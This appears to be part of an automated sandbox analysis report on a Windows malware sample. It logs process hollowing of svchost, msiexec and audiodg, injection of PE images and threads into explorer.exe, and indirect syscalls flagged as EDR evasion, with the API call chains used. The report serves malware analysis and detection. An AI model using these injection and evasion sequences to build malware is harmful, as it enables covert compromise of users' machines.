          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 protect: page execute and read and writeJump to behavior
          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A831F8C GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF63A831F8C
          Contains functionality to inject threads in other processes
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A832BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,0_2_00007FF63A832BFC
          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF6EEF22BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,2_2_00007FF6EEF22BFC
          Source: C:\Windows\explorer.exeCode function: 4_2_0E92F6B0 free,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,4_2_0E92F6B0
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F4420 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,4_2_0E8F4420
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F3320 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,4_2_0E8F3320
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4DF6B0 free,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,4_2_0F4DF6B0
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A4420 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,4_2_0F4A4420
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A3320 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,4_2_0F4A3320
          Source: C:\Windows\explorer.exeCode function: 4_2_10D63320 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,4_2_10D63320
          Source: C:\Windows\explorer.exeCode function: 4_2_10D64420 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,4_2_10D64420
          Source: C:\Windows\explorer.exeCode function: 4_2_10D9F6B0 free,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,4_2_10D9F6B0
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeCode function: 5_2_00007FF7821C2BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,5_2_00007FF7821C2BFC
          Source: C:\Windows\System32\audiodg.exeCode function: 7_2_00007FF6626D2BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,7_2_00007FF6626D2BFC
          Source: C:\Windows\System32\msiexec.exeCode function: 8_2_00007FF7F2D02BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,8_2_00007FF7F2D02BFC
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\audiodg.exeThread created: C:\Windows\explorer.exe EIP: C3694E0Jump to behavior
          Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: A0394E0Jump to behavior
          Source: C:\Windows\System32\msiexec.exeThread created: C:\Windows\explorer.exe EIP: E8B94E0Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeNtUnmapViewOfSection: Indirect: 0x7FF7821C2320Jump to behavior
          Source: C:\Users\user\Desktop\file.exeNtUnmapViewOfSection: Indirect: 0x7FF63A832320Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: A020000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: E8A0000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 value starts with: 4D5AJump to behavior
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\audiodg.exeMemory written: PID: 2580 base: C350000 value: 4DJump to behavior
          Source: C:\Windows\System32\svchost.exeMemory written: PID: 2580 base: A020000 value: 4DJump to behavior
          Source: C:\Windows\System32\msiexec.exeMemory written: PID: 2580 base: E8A0000 value: 4DJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\file.exeThread register set: target process: 7040Jump to behavior
          Source: C:\Users\user\Desktop\file.exeThread register set: target process: 7076Jump to behavior
          Source: C:\Users\user\Desktop\file.exeThread register set: target process: 7020Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeThread register set: target process: 6976Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeThread register set: target process: 6992Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeThread register set: target process: 6996Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeThread register set: target process: 1272Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeThread register set: target process: 1068Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeThread register set: target process: 744Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\file.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF6EEF20000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7F2D00000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6626D0000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF6EEF20000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7F2D00000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6626D0000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6626D0000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7F2D00000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF6EEF20000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF21000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF25000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF27000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF28000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF29000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\svchost.exe base: 438968010Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D01000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D05000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D07000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D08000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D09000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\msiexec.exe base: 2693452010Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D1000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D5000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D7000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D8000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D9000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\audiodg.exe base: 6A425CE010Jump to behavior
          Source: C:\Windows\System32\audiodg.exeMemory written: C:\Windows\explorer.exe base: C350000Jump to behavior
          Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: A020000Jump to behavior
          Source: C:\Windows\System32\msiexec.exeMemory written: C:\Windows\explorer.exe base: E8A0000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF21000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF25000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF27000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF28000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF29000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: B08CD08010Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D01000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D05000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D07000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D08000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D09000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: C246C10010Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D1000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D5000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D7000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D8000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D9000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 2042E32010Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D1000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D5000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D7000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D8000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF6626D9000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\audiodg.exe base: 17E0A37010Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D01000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D05000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D07000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D08000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D09000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\msiexec.exe base: 9B7FAF3010Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF21000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF25000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF27000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF28000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF6EEF29000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeMemory written: C:\Windows\System32\svchost.exe base: 724492D010Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe" Jump to behavior
          Source: explorer.exe, 00000004.00000000.1847439102.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.1846216730.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3071198191.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.1845313284.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3070194848.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000004.00000000.1846216730.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3071198191.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.1846216730.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3071198191.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Windows\explorer.exeCode function: 4_2_0A03F2EC cpuid 4_2_0A03F2EC
          Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,4_2_0A03EB98
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_0A046028
          Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0A045EAC
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_0A046D3C
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_0A0465B4
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_0A03D5CC
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_0C376D3C
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_0C3765B4
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_0C36D5CC
          Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0C375EAC
